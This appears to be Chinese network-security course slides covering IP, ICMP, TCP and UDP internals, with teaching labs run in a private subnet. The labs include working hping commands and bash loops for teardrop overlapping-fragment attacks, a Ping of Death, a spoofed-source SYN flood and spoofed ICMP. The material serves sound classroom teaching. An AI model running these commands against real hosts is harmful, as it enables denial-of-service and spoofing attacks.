网络安全高级应用第一章

合集下载
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

学员练习
30分钟完成
35
实验案例2:模拟实现SYN Flood
需求描述
使用hping构造SYN报文段,模拟实现SYN Flood
Web .1 192.168.1.0/24
.254 E0/1 E0/0 E0/2 R1 .254 .1 .254 .1 PC1 192.168.0.0/24 192.168.2.0/24 PC2
25
TCP的数据传输和连接终止
数据传输
连接建立后,客户端和服务器都可以在两个方向传送 数据和确认。 两种比较特殊的数据传送
推送数据
紧急数据
连接终止
建立与FTP站点的连接 在FTP站点(Web主机)启用Sniffer软件 输入命令“bye”断开连接,分析数据报文
教员演示操作过程
26
TCP的连接终止和连接复位
TCP报文段首部的格式
TCP连接
TCP协议
TCP的MSS TCP的其它机制
UDP协议
6
IP数据报
IP数据报的组成 IP数据报首部的格式
版本(4)
首部长度 (4)
区分服务(8) 标志 (3)
总长度(16) 分片偏移(13) 首部校验和(16)
标识(16) TTL(8) 协议号(8)
源IP地址(32) 目标IP地址(32) 选项
2
课程结构
第一部分
TCP/IP与Cisco防火墙 1. TCP/IP协议分析 2. 基于TCP/IP的网络攻击 3. ASA安全设备的基本配 置 4. ASA安全设备的高级应 用
第二部分
VPN的配置与故障排查
第三部分
网络与服务器访问控制
1. VPN技术的理论 1. 部署802.1x接入认证, 2. IPSec VPN的配置与故 增强局域网安全 障排查 2.搭建AAA服务器,控制 3. 基于ASA和路由器实现 内网用户访问DMZ区 Easy VPN和SSL 服务器 VPN 3.搭建AAA服务器,控制 VPN接入用户访问 DMZ区服务器 第3~5章 第6~7章
教员演示操作过程
14
构造重叠偏移的IP分片
将分片2的偏移值指定为400,偏移就会重叠
0 400 分片1的数据部分
分片2的数据部分
实现命令
./hping 192.168.1.1 -1 -d 200 -g 400 -N 100 -c 1
15
模拟泪滴攻击
开启Sniffer软件 Web 运行脚本文件 编写脚本文件 teardrop.sh
教员演示操作过程
23
TCP协议
TCP报文段的封装 TCP报文段的首部格式
源端口号(16) 目标端口号(16) 序号(32)
确认号(32)
U A P R S F 首部 保留 R C S S Y I 长度 (6) (4) G K H T N N
TCP编号的特点: 初始序号随机 每一个方向的编号互相独立 窗口大小(16) 每个字节都编号,序号就是 报文段中第一个字节的编号
校验和(16) 选项
紧急指针(16)
24
TCP连接
面向连接的协议 TCP连接的三个阶段
连接建立 数据传输 连接终止
连接建立
3次握手 产生安全问题,即SYN Flood SYN Flood的演示
在PC2上发动SYN Flood攻击: hping 192.168.1.1 –p 80 –i u1 –S –a 1.1.1.1
BENET3.0第二学期课程
网络安全高级应用
课程目标
掌握TCP/IP高级技术 部署Cisco ASA安全设备防御网络攻击 理解VPN技术理论,配置实现IPSec VPN、Easy VPN、SSL VPN,并能够排除故障 部署802.1x局域网接入认证,增强网络安全性 搭建AAA服务器,控制内网和VPN接入用户访问 应用服务器的权限
MSS的概念 MSS选项的格式
种类:2
1字节
长度:4 1字节
最大报文段长度 2字节
MSS与MTU MSS的特点
只存在于SYN报文和SYN+ACK报文中 在连接建立阶段协商确定后,在连接期间保持不变
MSS的演示实验
教员演示操作过程
28
TCP的其它机制
流量控制
滑动窗口
窗口大小 已发送, 且已确认 …… n-1 已发送, 但未确认 n n+1 可立即发送 …… 在窗口展开之 前不能被发送 ……
说明
构造正常的IP分片
开启Sniffer软件
Web
运行脚本文件 编写脚本文件 cs.sh E0/0 E0/1 E0/2 R1 PC2
PC1
[root@kkg sbin]# more cs.sh 分析Web主机抓到的报文 #!/bin/bash Web主机返回Echo reply,说明重装成功 ./hping 192.168.1.1 -1 -x -d 1000 -N 100 -c 1 ./hping 192.168.1.1 -1 -d 200 -g 1008 -N 100 -c 1
34
实验案例1:模拟实现死亡之Ping
实现思路
构造重装后大于65535字节的IP分片
./hping 192.168.1.1 -1 -x -d 1400 -N 100 -c 1 for ((i=1;i<50;i++)) do j=`expr $i \* 1408` ./hping 192.168.1.1 -1 -x -d 1400 -g $j -N 100 -c 1 done ./hping 192.168.1.1 -1 -d 1000 -g 70400 -N 100 -c 1
22
超时报文的演示
在PC1主机上启用Sniffer抓包 在PC2主机上向Web主机发送1个TTL为1的ICMP报 文,并伪造源IP为192.168.0.1(PC1主机)
[root@kkg sbin]# hping 192.168.1.1 -1 -t 1 -c 1 –a 192.168.0.1
分析抓到的数据包
E0/0
PC1
E0/1 E0/2 R1
持续攻击50次
PC2
#!/bin/bash for ((i=100;i<150;i++)) [root@kkg sbin]#./teardrop.sh do ./hping 192.168.1.1 -1 -x -d 1000 -N $i -c 1 ./hping 192.168.1.1 -1 -d 200 -g 400 -N $i -c 1 done
安装hping2源码包 RHEL5
PC1
主机
PC1
PC2 Web
192.168.0.1
192.168.2.1 192.168.1.1
192.168.0.254
192.168.2.254 192.168.1.254
9
IP分片-演示实验过程
开启Sniffer软件 Web
Ping命令测试
E0/0 PC1 E0/1 E0/2 R1 PC2
泪滴(teardrop)攻击 Hping可以构造各种IP、ICMP、TCP、UDP报文
hping相关参数说明
参数
-1 -2 -p -i -S -a -c -N -t -x -g -C -d 使用ICMP模式 使用UDP模式 指定目的主机端口号 设置发送时间间隔,例如 -i u100 表示间隔100微秒 设置SYN标志 伪造源IP地址 发送数据包个数 设置IP包的ID 设置TTL(默认64) 设置more fragments 标志 设置fragment offset 设置ICMP类型 设置载荷大小 13
C:\> ping 192.168.1.1 –l 2000 –n 1 -n:发送数据报文的个数 - l:发送数据报文的大小
教员演示操作过程
10
IP分片-演示实验分析
分片1: 分片2:
每个分片都是独立的IP数据报文,都有一个20字节的首部 Fragment offset(分片偏移): Flags(标志): Identification(标志): 分片报文在原始数据报文中的偏移量 第2位:0表示允许分片 标识都为6307,表示它们原先属于同一个IP数据报文
教员演示操作过程
21
源点抑制报文和超时报文
源点抑制报文的概念
对每一个因为拥塞而丢弃的数据报,路由器或主机都 应当发送源点抑制报文。
超时报文产生的两种情况:
中间路由器收到数据报后发现其TTL字段的值为1或0 目的主机在规定时间内没有收到所有的分片
超时报文的首部格式
类型:11 代码:0或1 未使用(全0) 校验和
—— 上机部分
实验案例1:模拟实现死亡之Ping
需求描述
使用hping构造IP分片,模拟实现死亡之Ping
Web .1 192.168.1.0/24
.254 E0/1 E0/0 E0/2 R1 .254 .1 .254 .1 PC1 192.168.0.0/24 192.168.2.0/24 PC2
7
IP分片
IP分片的原理
MTU 以太网常见的帧格式:
目的地址 源地址 类型 数据Fra Baidu bibliotekFCS
MTU
再分片 分片重装
8
IP分片-演示实验环境
Windows2003 安装Sniffer软件
Web
安装Sniffer软件 Windows2003 E0/0 E0/1 E0/2 R1 PC2 IP IP 设备 R1
UDP长度(16)
目标端口号(16)
UDP校验和(16)
31
本章总结
IP数据报首部的格式 IP数据报 IP分片 查询报文
ICMP报文
差错报告报文 TCP/IP高级 技术
TCP报文段首部的格式
TCP连接
TCP协议
TCP的MSS TCP的其它机制
UDP协议
32
BENET3.0第二学期课程
第一章 TCP/IP高级技术
第1~2章
3
BENET3.0第二学期课程
第一章 TCP/IP高级技术
—— 理论部分
技能展示
会分析IP数据报首部的格式 会分析ICMP报文首部的格式 会分析TCP和UDP报文首部的格式 会使用hping模拟实现网络攻击
5
本章结构
IP数据报首部的格式 IP数据报 IP分片 查询报文
ICMP报文
差错报告报文 TCP/IP高级 技术
TCP断开连接的四次握手示意图
PC1 1. 发送FIN/ACK报文 (FIN=1,ACK=1) PC2
2. 发送ACK报文 (ACK=1) 3. 发送FIN/ACK报文 (FIN=1,ACK=1)
4. 发送ACK报文 (ACK=1)
连接复位
拒绝连接请求、异常终止连接、终止空闲的连接
27
TCP的MSS
第3位:0表示最后一个分片,1表示还有后续的分片
11
IP分片-偏移值
原始数据报
数据部分的长度:2000+8=2008
分片1
数据部分的长度:1480 偏移:0 偏移:1480
2007
分片2
数据部分的长度:528
0
1479 1480 原始数据包的数据部分 分片1的数据部分
分片2的数据部分
12
IP分片的安全问题
m-1 m m+1
合拢
展开
差错控制 拥塞控制
29
TCP的计时器
重传计时器
用来重传丢失的报文段
持久计时器
用来防止出现TCP/IP死锁
保活计时器
计时器超时,将发送探测报文段,判定客户端故障
时间等待计时器
用于终止连接
30
UDP协议
UDP协议
无连接、不可靠的传输协议 花费的开销小
UDP报文的首部格式
源端口号(16)
19
主机不可达的演示
在Web主机上启用Sniffer抓包 在Web主机上ping一台未知网络中的主机
C:\> ping 1.1.1.1 Reply from 192.168.1.254: Destination host unreachable.
分析抓到的数据包
Type = 3 Code = 1(host unreachable)
18
终点不可达报文
终点不可达报文的理解
中间路由设备没有路由或目的主机不能向上层交付数 据报文时,会丢弃数据报文并向源点发送不可达报文
终点不可达报文的首部格式
类型:3 代码:0-15
未使用(全0)
校验和
丢弃数据报的原因
代码1:Host unreachable(主机不可达) 代码3:Port unreachable(端口不可达)
教员演示操作过程
20
端口不可达的演示
在Web主机上启用Sniffer抓包 在PC2主机上向Web主机的UDP端口80发送一个 UDP报文
[root@kkg sbin]# hping 192.168.1.1 -2 -p 80 -c 1
分析抓到的数据包
Type = 3 Code = 3(port unreachable)
教员演示操作过程
16
小结
请思考:
在IP首部中,与分片有关的字段是哪几个? 什么是泪滴(teardrop)攻击 ?
17
ICMP报文
ICMP报文首部的一般格式
8位 类型 8位 代码 16位 校验和
首部的其余部分
ICMP报文的分类
查询报文
类型8 — Echo 类型0 — Echo Reply
差错报告报文
相关文档
最新文档